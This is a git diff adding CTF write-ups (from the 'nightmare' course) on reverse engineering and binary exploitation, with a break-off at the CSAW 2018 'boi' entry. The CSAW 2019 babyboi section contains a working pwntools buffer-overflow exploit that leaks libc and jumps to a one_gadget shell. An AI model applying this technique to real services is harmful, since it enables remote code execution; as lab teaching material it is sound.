+11 is the third character **(0x00301020 + (4*11)) = 0x301064** this corresponds to the a character
+
+
+ fla
+
+
+27 is the fourth character **(0x00301020 + (4*27)) = 0x3010bc** this corresponds to the g character
+
+
+ flag
+
+
+from here you keep going and you end up with the following:
+
+
+ flag{we_beleaf_in_your_re_future}
+
+
+
+so just run the binary with the flag to verify it is correct:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ./beleaf
+ Enter the flag
+ >>> flag{we_beleaf_in_your_re_future}
+ Correct!
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/1/heli.md b/1/heli.md
new file mode 100644
index 0000000..1676f36
--- /dev/null
+++ b/1/heli.md
@@ -0,0 +1,294 @@
+# Helithumper Reverse Engineering
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/helithumper_re/rev
+ --2021-02-22 17:19:05-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/helithumper_re/rev
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/helithumper_re/rev [following]
+ --2021-02-22 17:19:05-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/helithumper_re/rev
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 16704 (16K) [application/octet-stream]
+ Saving to: ‘rev’
+
+ rev 100%[===============================================================================>] 16.31K --.-KB/s in 0s
+
+ 2021-02-22 17:19:05 (37.3 MB/s) - ‘rev’ saved [16704/16704]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file rev
+ rev: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e4dbcb1281821db359d566c68fea7380aeb27378, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x rev
+
+
+
+` ![]()
+
+## Solution
+
+Run the binary
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ./rev
+ Welcome to the Salty Spitoon™, How tough are ya?
+ very though
+ Yeah right. Back to Weenie Hut Jr™ with ya
+
+
+here the binary prints some text, then lets us input our text (here its 'very though') and then prints some text again. It is safe to assume that we will need to type the correct passphrase to get the correct output. So let's inspect the binary file from ghidra:
+
+ 
+
+now from here we want to check out the main function of our binary file, so go into the symbol tree tab, into functions, into main, and we get the following code:
+
+
+
+
+ bool main(void)
+
+ {
+ int iVar1;
+ void *pvVar2;
+
+ pvVar2 = calloc(0x32,1);
+ puts(&DAT;_00102008);
+ __isoc99_scanf(&DAT;_0010203b,pvVar2);
+ iVar1 = validate(pvVar2);
+ if (iVar1 == 0) {
+ puts(&DAT;_00102050);
+ }
+ else {
+ puts("Right this way...");
+ }
+ return iVar1 == 0;
+ }
+
+
+
+now here we see something, first of all it does a scanf (to prompt for our input) and then moves our text into pvVar2, then, it calls a function called 'validate' and the result of that function gets put into iVar1 which determines if we get a correct answer or not. So let's inspect the 2 possibilities of the if statement:
+
+
+ if (iVar1 == 0) {
+ puts(&DAT;_00102050);
+ }
+ else {
+ puts("Right this way...");
+ }
+
+
+From ghidra we see that this '&DAT;_00102050' is the string of characters we saw earlier:
+
+
+
+therefore, we do not want iVar1 to be equal to 0, we want iVar1 to be equal to 1
+
+So the hint here is, what is being validated ? How is our input being validated ? we inspect the validate function which HAS TO return 1, if we want our iVar1 to be equal to 1:
+
+
+
+Which gives us the following code:
+
+
+ undefined8 validate(char *param_1)
+
+ {
+ size_t sVar1;
+ undefined8 uVar2;
+ long in_FS_OFFSET;
+ int local_50;
+ int local_48 [4];
+ undefined4 local_38;
+ undefined4 local_34;
+ undefined4 local_30;
+ undefined4 local_2c;
+ undefined4 local_28;
+ undefined4 local_24;
+ undefined4 local_20;
+ undefined4 local_1c;
+ undefined4 local_18;
+ undefined4 local_14;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_48[0] = 0x66;
+ local_48[1] = 0x6c;
+ local_48[2] = 0x61;
+ local_48[3] = 0x67;
+ local_38 = 0x7b;
+ local_34 = 0x48;
+ local_30 = 0x75;
+ local_2c = 0x43;
+ local_28 = 0x66;
+ local_24 = 0x5f;
+ local_20 = 0x6c;
+ local_1c = 0x41;
+ local_18 = 0x62;
+ local_14 = 0x7d;
+ sVar1 = strlen(param_1);
+ local_50 = 0;
+ do {
+ if ((int)sVar1 <= local_50) {
+ uVar2 = 1;
+ LAB_001012b7:
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return uVar2;
+ }
+ if ((int)param_1[local_50] != local_48[local_50]) {
+ uVar2 = 0;
+ goto LAB_001012b7;
+ }
+ local_50 = local_50 + 1;
+ } while( true );
+ }
+
+
+So first of all our input text gets passed into the validate function via the param_1 parameter. It enters a do{} while(); loop, with each iteration of that while loop, there is a value that gets incremented, the only return statements of that function are either return uVar2 or either not making the function return anything at all, instead going to the __stack_chk_fail() function. therefore the important value here is uVar2
+
+
+ int local_48 [4];
+
+ [...]
+
+ local_48[0] = 0x66;
+ local_48[1] = 0x6c;
+ local_48[2] = 0x61;
+ local_48[3] = 0x67;
+
+ [...]
+
+ if ((int)param_1[local_50] != local_48[local_50]) {
+ uVar2 = 0;
+ goto LAB_001012b7;
+ }
+ local_50 = local_50 + 1;
+
+
+Here we see that our each character of our input (param1) gets checked against the corresponding character of the local_48 string. Therefore we need to make sure our input matches the values inside of local_48's 0,1,2,3 characters. so we know we have to look at the following addresses:
+
+
+ 0x66
+ 0x6c
+ 0x61
+ 0x67
+
+
+
+From Ghidra, we see the following assembly code:
+
+
+ 00101205 c7 45 c0 MOV dword ptr [RBP + local_48],0x66
+ 66 00 00 00
+ 0010120c c7 45 c4 MOV dword ptr [RBP + local_44],0x6c
+ 6c 00 00 00
+ 00101213 c7 45 c8 MOV dword ptr [RBP + local_40],0x61
+ 61 00 00 00
+ 0010121a c7 45 cc MOV dword ptr [RBP + local_3c],0x67
+ 67 00 00 00
+
+
+
+
+ 00101221 c7 45 d0 MOV dword ptr [RBP + local_38],0x7b
+ 7b 00 00 00
+ 00101228 c7 45 d4 MOV dword ptr [RBP + local_34],0x48
+ 48 00 00 00
+ 0010122f c7 45 d8 MOV dword ptr [RBP + local_30],0x75
+ 75 00 00 00
+ 00101236 c7 45 dc MOV dword ptr [RBP + local_2c],0x43
+ 43 00 00 00
+ 0010123d c7 45 e0 MOV dword ptr [RBP + local_28],0x66
+ 66 00 00 00
+ 00101244 c7 45 e4 MOV dword ptr [RBP + local_24],0x5f
+ 5f 00 00 00
+ 0010124b c7 45 e8 MOV dword ptr [RBP + local_20],0x6c
+ 6c 00 00 00
+ 00101252 c7 45 ec MOV dword ptr [RBP + local_1c],0x41
+ 41 00 00 00
+ 00101259 c7 45 f0 MOV dword ptr [RBP + local_18],0x62
+ 62 00 00 00
+ 00101260 c7 45 f4 MOV dword ptr [RBP + local_14],0x7d
+ 7d 00 00 00
+
+
+Now from here we can get the list of specific bytes our input needs to be:
+
+
+ 0x66
+ 0x6c
+ 0x61
+ 0x67
+
+ 0x7b
+ 0x48
+ 0x75
+ 0x43
+ 0x66
+ 0x5f
+ 0x6c
+ 0x41
+ 0x62
+ 0x7d
+
+
+Now let's move over to python:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ls -lash
+ total 788K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Feb 22 17:19 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Feb 22 17:23 ..
+ 20K -rwxr-xr-x 1 nothing nothing 17K Feb 22 17:19 rev
+ 760K -rwxr-xr-x 1 nothing nothing 759K Feb 22 17:12 strings
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file rev
+ rev: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e4dbcb1281821db359d566c68fea7380aeb27378, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → python3
+ Python 3.9.1+ (default, Feb 5 2021, 13:46:56)
+ [GCC 10.2.1 20210110] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> x = [0x66, 0x6c, 0x61, 0x67, 0x7b, 0x48, 0x75, 0x43, 0x66, 0x5f, 0x6c, 0x41, 0x62, 0x7d]
+ >>> input = ""
+ >>> for i in x:
+ ... input += chr(i)
+ ...
+ >>> input
+ 'flag{HuCf_lAb}'
+
+
+And here we see that the first 4 addresses were 'flag' the next 10 were '{HuCf_lAb}', this obviously was fairly easy
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/1/strings.md b/1/strings.md
new file mode 100644
index 0000000..b571547
--- /dev/null
+++ b/1/strings.md
@@ -0,0 +1,75 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/pico18_strings/strings
+ --2021-02-22 17:12:22-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/pico18_strings/strings
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/pico18_strings/strings [following]
+ --2021-02-22 17:12:22-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/pico18_strings/strings
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776368 (758K) [application/octet-stream]
+ Saving to: ‘strings’
+
+ strings 100%[=======================================================================================================================================================================================================>] 758.17K --.-KB/s in 0.1s
+
+ 2021-02-22 17:12:23 (5.86 MB/s) - ‘strings’ saved [776368/776368]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file strings
+ strings: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e337b489c47492dd5dff90353eb227b4e7e69028, not stripped
+
+
+` ![]()
+
+## Solution
+
+The solution is fairly simple, first make the binary file executable, then run it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x strings
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/1]
+ → ./strings
+ Have you ever used the 'strings' function? Check out the man pages!
+
+
+Here we are hinted at using the strings function, so we will do so and use grep to try and see if the flag appears, generally the flag contains {flaghash} so we can use grep to find it :
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → strings strings | grep {
+ picoCTF{sTrIngS_sAVeS_Time_3f712a28}
+
+
+
+And we're done!
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/0.md b/2/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/2/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/1.png b/2/1.png
new file mode 100644
index 0000000..7362644
Binary files /dev/null and b/2/1.png differ
diff --git a/2/10.png b/2/10.png
new file mode 100644
index 0000000..11ce2fc
Binary files /dev/null and b/2/10.png differ
diff --git a/2/11.png b/2/11.png
new file mode 100644
index 0000000..ce165d2
Binary files /dev/null and b/2/11.png differ
diff --git a/2/12.png b/2/12.png
new file mode 100644
index 0000000..31cd0f8
Binary files /dev/null and b/2/12.png differ
diff --git a/2/13.png b/2/13.png
new file mode 100644
index 0000000..ea855d6
Binary files /dev/null and b/2/13.png differ
diff --git a/2/14.png b/2/14.png
new file mode 100644
index 0000000..2273671
Binary files /dev/null and b/2/14.png differ
diff --git a/2/15.png b/2/15.png
new file mode 100644
index 0000000..52c1eed
Binary files /dev/null and b/2/15.png differ
diff --git a/2/16.png b/2/16.png
new file mode 100644
index 0000000..2a4586b
Binary files /dev/null and b/2/16.png differ
diff --git a/2/17.png b/2/17.png
new file mode 100644
index 0000000..1eb1558
Binary files /dev/null and b/2/17.png differ
diff --git a/2/18.png b/2/18.png
new file mode 100644
index 0000000..9964e91
Binary files /dev/null and b/2/18.png differ
diff --git a/2/19.png b/2/19.png
new file mode 100644
index 0000000..2edd6ef
Binary files /dev/null and b/2/19.png differ
diff --git a/2/2.png b/2/2.png
new file mode 100644
index 0000000..c36da1f
Binary files /dev/null and b/2/2.png differ
diff --git a/2/20.png b/2/20.png
new file mode 100644
index 0000000..0dd2cd3
Binary files /dev/null and b/2/20.png differ
diff --git a/2/21.png b/2/21.png
new file mode 100644
index 0000000..e03ebb8
Binary files /dev/null and b/2/21.png differ
diff --git a/2/22.png b/2/22.png
new file mode 100644
index 0000000..a2dda63
Binary files /dev/null and b/2/22.png differ
diff --git a/2/23.png b/2/23.png
new file mode 100644
index 0000000..c377482
Binary files /dev/null and b/2/23.png differ
diff --git a/2/24.png b/2/24.png
new file mode 100644
index 0000000..05a8913
Binary files /dev/null and b/2/24.png differ
diff --git a/2/25.png b/2/25.png
new file mode 100644
index 0000000..15b3bf2
Binary files /dev/null and b/2/25.png differ
diff --git a/2/26.png b/2/26.png
new file mode 100644
index 0000000..8f56007
Binary files /dev/null and b/2/26.png differ
diff --git a/2/27.png b/2/27.png
new file mode 100644
index 0000000..bc1096f
Binary files /dev/null and b/2/27.png differ
diff --git a/2/28.png b/2/28.png
new file mode 100644
index 0000000..4811056
Binary files /dev/null and b/2/28.png differ
diff --git a/2/29.png b/2/29.png
new file mode 100644
index 0000000..8d66b12
Binary files /dev/null and b/2/29.png differ
diff --git a/2/3.png b/2/3.png
new file mode 100644
index 0000000..2a79c4f
Binary files /dev/null and b/2/3.png differ
diff --git a/2/30.png b/2/30.png
new file mode 100644
index 0000000..2be4193
Binary files /dev/null and b/2/30.png differ
diff --git a/2/31.png b/2/31.png
new file mode 100644
index 0000000..66d54da
Binary files /dev/null and b/2/31.png differ
diff --git a/2/32.png b/2/32.png
new file mode 100644
index 0000000..41c0e1a
Binary files /dev/null and b/2/32.png differ
diff --git a/2/33.png b/2/33.png
new file mode 100644
index 0000000..e2d4711
Binary files /dev/null and b/2/33.png differ
diff --git a/2/34.png b/2/34.png
new file mode 100644
index 0000000..74a7a57
Binary files /dev/null and b/2/34.png differ
diff --git a/2/35.png b/2/35.png
new file mode 100644
index 0000000..a2dea85
Binary files /dev/null and b/2/35.png differ
diff --git a/2/4.png b/2/4.png
new file mode 100644
index 0000000..4343514
Binary files /dev/null and b/2/4.png differ
diff --git a/2/40.png b/2/40.png
new file mode 100644
index 0000000..e5300c5
Binary files /dev/null and b/2/40.png differ
diff --git a/2/41.png b/2/41.png
new file mode 100644
index 0000000..b324ae8
Binary files /dev/null and b/2/41.png differ
diff --git a/2/42.png b/2/42.png
new file mode 100644
index 0000000..9544992
Binary files /dev/null and b/2/42.png differ
diff --git a/2/43.png b/2/43.png
new file mode 100644
index 0000000..1201e1b
Binary files /dev/null and b/2/43.png differ
diff --git a/2/44.png b/2/44.png
new file mode 100644
index 0000000..2f064e3
Binary files /dev/null and b/2/44.png differ
diff --git a/2/45.png b/2/45.png
new file mode 100644
index 0000000..ada78c4
Binary files /dev/null and b/2/45.png differ
diff --git a/2/46.png b/2/46.png
new file mode 100644
index 0000000..51bfe39
Binary files /dev/null and b/2/46.png differ
diff --git a/2/47.png b/2/47.png
new file mode 100644
index 0000000..fec2b63
Binary files /dev/null and b/2/47.png differ
diff --git a/2/48.png b/2/48.png
new file mode 100644
index 0000000..6e1d9e8
Binary files /dev/null and b/2/48.png differ
diff --git a/2/49.png b/2/49.png
new file mode 100644
index 0000000..5f4a18f
Binary files /dev/null and b/2/49.png differ
diff --git a/2/5.png b/2/5.png
new file mode 100644
index 0000000..2e5c801
Binary files /dev/null and b/2/5.png differ
diff --git a/2/50.png b/2/50.png
new file mode 100644
index 0000000..46524e7
Binary files /dev/null and b/2/50.png differ
diff --git a/2/51.png b/2/51.png
new file mode 100644
index 0000000..71eb30b
Binary files /dev/null and b/2/51.png differ
diff --git a/2/6.png b/2/6.png
new file mode 100644
index 0000000..67bdb42
Binary files /dev/null and b/2/6.png differ
diff --git a/2/7.png b/2/7.png
new file mode 100644
index 0000000..723bda5
Binary files /dev/null and b/2/7.png differ
diff --git a/2/8.png b/2/8.png
new file mode 100644
index 0000000..77f3ee1
Binary files /dev/null and b/2/8.png differ
diff --git a/2/9.png b/2/9.png
new file mode 100644
index 0000000..3224b3f
Binary files /dev/null and b/2/9.png differ
diff --git a/2/bboi.md b/2/bboi.md
new file mode 100644
index 0000000..53da386
--- /dev/null
+++ b/2/bboi.md
@@ -0,0 +1,308 @@
+# Csaw 2019 babyboi
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/baby_boi
+
+ baby_boi 100%[==========================================================>] 8.41K --.-KB/s in 0.001s
+
+ 2021-03-06 15:19:56 (16.1 MB/s) - ‘baby_boi’ saved [8608/8608]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/baby_boi.c
+
+ baby_boi.c 100%[==========================================================>] 274 --.-KB/s in 0s
+
+ 2021-03-06 15:20:10 (27.1 MB/s) - ‘baby_boi.c’ saved [274/274]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/libc-2.27.so
+
+ libc-2.27.so 100%[==========================================================>] 1.94M 2.79MB/s in 0.7s
+
+ 2021-03-06 15:20:19 (2.79 MB/s) - ‘libc-2.27.so’ saved [2030544/2030544]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → file baby_boi
+ baby_boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1ff55dce2efc89340b86a666bba5e7ff2b37f62, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → chmod +x baby_boi
+
+
+
+` ![]()
+
+## Solution
+
+first let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f158ee88590
+ ok
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f7090800590
+ hello
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f4a5ed57590
+ bye
+
+
+
+The binary basically outputs some text, then it lekas some memorya ddress, and then lets us put in some text. Let's run pwn checksec on it and check what are the other files about:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → pwn checksec baby_boi
+ [*] '/home/nothing/binexp/2/bboi/baby_boi'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → cat baby_boi.c
+ #include
+ #include
+
+ int main(int argc, char **argv[]) {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+
+ char buf[32];
+ printf("Hello!\n");
+ printf("Here I am: %p\n", printf);
+ gets(buf);
+ }
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./libc-2.27.so
+ zsh: permission denied: ./libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → chmod +x libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./libc-2.27.so
+ Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!
+
+
+
+
+Now here we see that the binary just prompts us for text, and looking at the sourcecode, we see that it prints the libc address for printf. After that, it makes a **gets** call on a fixed size buffer of 32 bytes (0x20 bytes) so this means that we have a buffer overflow. We also see that the libc version is **2.27** The only binary protection that we have is NX.
+
+To exploit this, we will use the buffer overflow vulnerability we just mentionned, and then we will call a oneshot gadget, which is a single ROP gadget in the libc library that will call **execve("/bin/sh")** given the right conditions, we find this using the [one_gadget](https://github.com/david942j/one_gadget) utility:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [~]
+ → sudo pacman -S rubygems
+ [sudo] password for nothing:
+ warning: rubygems-3.2.13-1 is up to date -- reinstalling
+ resolving dependencies...
+ looking for conflicting packages...
+
+ Package (1) Old Version New Version Net Change
+
+ extra/rubygems 3.2.13-1 3.2.13-1 0.00 MiB
+
+ Total Installed Size: 0.92 MiB
+ Net Upgrade Size: 0.00 MiB
+
+ :: Proceed with installation? [Y/n] y
+ (1/1) checking keys in keyring [----------------------------------------------] 100%
+ (1/1) checking package integrity [----------------------------------------------] 100%
+ (1/1) loading package files [----------------------------------------------] 100%
+ (1/1) checking for file conflicts [----------------------------------------------] 100%
+ (1/1) checking available disk space [----------------------------------------------] 100%
+ :: Processing package changes...
+ (1/1) reinstalling rubygems [----------------------------------------------] 100%
+ :: Running post-transaction hooks...
+ (1/1) Arming ConditionNeedsUpdate...
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [~]
+ → gem install one_gadget
+ Fetching one_gadget-1.7.4.gem
+ Fetching bindata-2.4.8.gem
+ Fetching elftools-1.1.3.gem
+ WARNING: You don't have /home/nothing/.local/share/gem/ruby/2.7.0/bin in your PATH,
+ gem executables will not run.
+ Successfully installed bindata-2.4.8
+ Successfully installed elftools-1.1.3
+ Successfully installed one_gadget-1.7.4
+ 3 gems installed
+
+
+
+Here for some reason the binary to run one_gadget isn't in my $PATH so i have to make a symlink to it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → sudo updatedb;locate one_gadget | grep 'gadget$'
+ /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget
+ /home/nothing/.local/share/gem/ruby/2.7.0/gems/one_gadget-1.7.4/bin/one_gadget
+ /home/nothing/.local/share/gem/ruby/2.7.0/gems/one_gadget-1.7.4/lib/one_gadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget
+ Usage: one_gadget [options]
+ -b, --build-id BuildID BuildID[sha1] of libc.
+ -f, --[no-]force-file Force search gadgets in file instead of build id first.
+ -l, --level OUTPUT_LEVEL The output level.
+ OneGadget automatically selects gadgets with higher successful probability.
+ Increase this level to ask OneGadget show more gadgets it found.
+ Default: 0
+ -n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
+ -r, --[no-]raw Output gadgets offset only, split with one space.
+ -s, --script exploit-script Run exploit script with all possible gadgets.
+ The script will be run as 'exploit-script $offset'.
+ --info BuildID Show version information given BuildID.
+ --base BASE_ADDRESS The base address of libc.
+ Default: 0
+ --version Current gem version.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/21 ] [~]
+ → echo $PATH
+ /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/lib/jvm/default/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl:/var/lib/snapd/snap/bin
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → sudo ln -s /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget /usr/local/bin/one_gadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → zsh
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → one_gadget
+ Usage: one_gadget [options]
+ -b, --build-id BuildID BuildID[sha1] of libc.
+ -f, --[no-]force-file Force search gadgets in file instead of build id first.
+ -l, --level OUTPUT_LEVEL The output level.
+ OneGadget automatically selects gadgets with higher successful probability.
+ Increase this level to ask OneGadget show more gadgets it found.
+ Default: 0
+ -n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
+ -r, --[no-]raw Output gadgets offset only, split with one space.
+ -s, --script exploit-script Run exploit script with all possible gadgets.
+ The script will be run as 'exploit-script $offset'.
+ --info BuildID Show version information given BuildID.
+ --base BASE_ADDRESS The base address of libc.
+ Default: 0
+ --version Current gem version.
+
+
+
+
+Now that's done, let's run one_gadget on the libc library:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → one_gadget libc-2.27.so
+ 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ rsp & 0xf == 0
+ rcx == NULL
+
+ 0x4f322 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ [rsp+0x40] == NULL
+
+ 0x10a38c execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+So here we see that we can leverage the libc infoleak with the printf statement to the libc printf which we know the libc version, we know the address space of the libc. For which onegadget to pick, it's usually trial and error to see what conditions will work. So let's make our exploit as follows:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ # Establish the target
+ target = process('./baby_boi', env={"LD_PRELOAD":"./libc-2.27.so"})
+ libc = ELF('libc-2.27.so')
+
+ print(target.recvuntil("ere I am: "))
+
+ # Scan in the infoleak
+ leak = target.recvline()
+ leak = leak.strip(b"\n")
+
+ base = int(leak, 16) - libc.symbols['printf']
+
+ print("wooo:" + hex(base))
+
+ # Calculate oneshot gadget
+ oneshot = base + 0x4f322
+
+ payload = b""
+ payload += b"\x00"*0x28 # Offset to oneshot gadget
+ payload += p64(oneshot) # Oneshot gadget
+
+ # Send the payload
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+Now execute it and we see the following:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/bboi]
+ → python3 exploit.py
+ [+] Starting local process './baby_boi': pid 540529
+ [*] '/home/nothing/binexp/2/bboi/libc-2.27.so'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ Hello!
+ Here I am:
+ wooo:0x7fedeb22e012
+ [*] Switching to interactive mode
+ $ cat flag.txt
+ flag{baby_boi_dodooo_doo_doo_dooo}
+
+
+And that's it! we have been able to spawn a shell and print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/boi.md b/2/boi.md
new file mode 100644
index 0000000..68c6451
--- /dev/null
+++ b/2/boi.md
@@ -0,0 +1,727 @@
+# CSAW 2018 Quals Boi
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/csaw18_boi/boi
+ --2021-02-22 21:57:40-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/csaw18_boi/boi
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/csaw18_boi/boi [following]
+ --2021-02-22 21:57:41-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/csaw18_boi/boi
